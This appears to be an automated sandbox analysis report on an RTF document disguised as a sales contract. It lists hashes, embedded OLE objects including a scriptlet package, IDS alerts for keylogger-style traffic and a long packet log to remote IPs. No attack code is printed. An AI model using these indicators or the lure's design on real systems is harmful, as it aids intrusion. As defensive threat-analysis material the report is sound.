Entropy (8bit):	2.503835550707525
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyHH/cgQfmW+eMdln:vdsCkWtUb+8ll
MD5:	D9C8F93ADB8834E5883B5A8AAAC0D8D9
SHA1:	23684CCAA587C442181A92E722E15A685B2407B1
SHA-256:	116394FEAB201D23FD7A4D7F6B10669A4CBCE69AF3575D9C1E13E735D512FA11
SHA-512:	7742E1AC50ACB3B794905CFAE973FDBF16560A7B580B5CD6F27FEFE1CB3EF4AEC2538963535493DCC25F8F114E8708050EDF5F7D3D146DF47DA4B958F0526515
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p........15..............25.............@35..............35.....z.......p45.....x...

Static File Info

General

File type:	Rich Text Format data, unknown version
Entropy (8bit):	3.1529159367533333
TrID:	Rich Text Format (5005/1) 55.56% Rich Text Format (4004/1) 44.44%
File name:	Revised sales contract for Crosswear.rtf
File size:	232189
MD5:	74ab9855f26b0cc2fca1fefd566f5642
SHA1:	09ebb7681f9989b7e98a17cbbff3cd7783712874
SHA256:	cda65753e2459754b1afd749ac2ce1c65415de966179e9bb53e822321c02c7ff
SHA512:	323c7219f267641386922739dbfb33cc9963891a3418e0f4d454d73df9f3a2d4848891f32ca60d64a6f822497fdbcfef8ac35cea4ac25ea02c5ca6929b6820d1
SSDEEP:	1536:icLLLLKDDABpYm3JH0qMPzdps5oE0g/y47ZVzFz76mAg5eeVhMDw5wfLD:icLLLLk9EjVzFtr5RDAw5wf/
TLSH:	6934FDB0655F08B6D308ED5E25A4B245AEB9FEE734C1547223AFE034CF59AF29EC8540
File Content Preview:	{\rtf\Fbidi \froman\fcharset238\ud1\adeff31507\deff0\stshfdbch31506\stshfloch31506\ztahffick41c05\fnhsfBi58207\deEflAng1045\deEglangfe1045\themelang1045\themelangfe1\themelangcs5{\lsdlockedexcept \lsdqformat2 \lsdpriority0 \lsdlocked0 Normal;\b865c6673647

File Icon


Icon Hash:	e4eea2aaa4b4b4a4

Static RTF Info

Objects

Id	Start	Format ID	Format	Classname	Datasize	Filename	Sourcepath	Temppath	Exploit
0	00000959h	2	embedded	package	20019	DRdtfhgYgeghDp.scT	C:\nsdsTggH\DRdtfhgYgeghDp.scT	C:\8jkepaD\DRdtfhgYgeghDp.scT	no
1	0000ACF1h	2	embedded	OLE2LInk	2560				no

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.2.22132.226.8.16949173802842536 08/23/22-13:43:14.345361	TCP	2842536	ETPRO TROJAN 404/Snake/Matiex Keylogger Style External IP Check	49173	80	192.168.2.22	132.226.8.169
192.168.2.22193.122.130.049175802842536 08/23/22-13:43:56.802113	TCP	2842536	ETPRO TROJAN 404/Snake/Matiex Keylogger Style External IP Check	49175	80	192.168.2.22	193.122.130.0
192.168.2.22193.122.130.049174802842536 08/23/22-13:43:29.255487	TCP	2842536	ETPRO TROJAN 404/Snake/Matiex Keylogger Style External IP Check	49174	80	192.168.2.22	193.122.130.0

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 23, 2022 13:42:48.272356987 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.335551977 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.335788965 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.336560965 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.397682905 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.425309896 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.425352097 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.425385952 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.425389051 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.425416946 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.425430059 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.425432920 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.425468922 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.425476074 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.425508022 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.425513029 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.425545931 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.425551891 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.425584078 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.425587893 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.425621986 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.425628901 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.425657988 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.425663948 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.425702095 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.429686069 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.486007929 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.486063957 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.486104012 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.486135960 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.486144066 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.486171961 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.486176968 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.486186028 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.486187935 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.486238956 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.486287117 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.486367941 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.486377954 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.486419916 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.486421108 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.486460924 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.486465931 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.486510992 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.486511946 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.486552000 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.486562967 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.486594915 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.486598015 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.486634970 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.486637115 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.486676931 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.486677885 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.486718893 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.486762047 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.486804008 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.486804962 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.486844063 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.486848116 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.486852884 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.486860991 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.486886024 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.486887932 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.486929893 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.486934900 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.486972094 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.490039110 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.547285080 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.547386885 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.547405005 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.547502041 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.547503948 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.547550917 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.547561884 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.547595024 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.547610044 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.547640085 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.547650099 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.547682047 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.547708988 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.547724962 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.547770977 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.547775030 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.547796965 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.547815084 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.547848940 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.547858953 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.547873020 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.547899008 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.547920942 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.547941923 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.547945023 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.547983885 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.548017979 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.548024893 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.548033953 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.548067093 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.548100948 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.548110008 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.548154116 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.548160076 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.548190117 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.548198938 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.548209906 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.548239946 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.548266888 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.548283100 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.548296928 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.548329115 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.548352957 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.548369884 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.548382998 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.548410892 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.548413038 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.548458099 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.548496008 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.548501015 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.548513889 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.548546076 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.548574924 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.548587084 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.548605919 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.548629045 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.548662901 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.548674107 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.548686981 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.548728943 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.548758030 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.548770905 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.548783064 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.548814058 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.548837900 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.548854113 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.548856974 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.548897028 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.548916101 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.548943043 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.548984051 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.549012899 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.549529076 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.550374031 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.550421953 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.550461054 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.550466061 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.550482988 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.550510883 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.550538063 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.550570965 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.551789999 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.552376032 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.609273911 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.609332085 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.609375954 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.609416008 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.609415054 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.609457970 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.609464884 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.609471083 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.609498024 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.609498978 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.609536886 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.609538078 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.609576941 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.609579086 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.609616995 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.609623909 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.609662056 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.609662056 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.609699965 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.609704018 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.609740973 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.609745026 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.609782934 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.609785080 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.609824896 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.609826088 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.609864950 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.609867096 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.609906912 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.609909058 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.609954119 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.609956980 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.609993935 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.610003948 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.610030890 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.610035896 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.610076904 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.610097885 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.610110998 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.610116959 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.610155106 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.610160112 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.610200882 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.610200882 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.610240936 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.610243082 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.610285044 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.610285997 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.610323906 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.610326052 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.610363007 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.610367060 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.610404968 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.610407114 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.610444069 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.610446930 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.610487938 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.610491037 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.610531092 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.610538960 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.610572100 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.610574007 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.610615015 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.610616922 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.610656977 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.610661983 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.610697985 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.610701084 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.610733986 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.610738993 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.610778093 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.610779047 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.610815048 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.610817909 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.610855103 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.610857964 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.610896111 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.610898972 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.610935926 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.610941887 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.610977888 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.610980988 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.611017942 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.611021996 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.611059904 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.611063957 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.611100912 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.611718893 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.611814976 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.611856937 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.611875057 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.611901999 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.612373114 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.612413883 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.612426996 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.612454891 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.612914085 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.613130093 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.671358109 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.671389103 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.671410084 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.671412945 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.671427011 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.671447992 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.671451092 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.671466112 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.671469927 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.671484947 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.671500921 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.671504021 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.671613932 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.672343016 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.672363043 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.672379971 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.672399998 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.672408104 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.672420979 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.672421932 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.672441006 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.672441959 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.672451973 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.672461987 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.672475100 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.672482014 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.672499895 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.672534943 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.672540903 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.672569036 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.672569036 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.672590017 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.672607899 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.672610044 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.672621012 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.672631025 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.672646999 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.672647953 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.672667027 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.672700882 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.672727108 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.672745943 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.672769070 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.672779083 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.672873974 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.672905922 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.672955990 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.672974110 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.672988892 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.673072100 CEST	80	49171	141.8.192.151	192.168.2.22
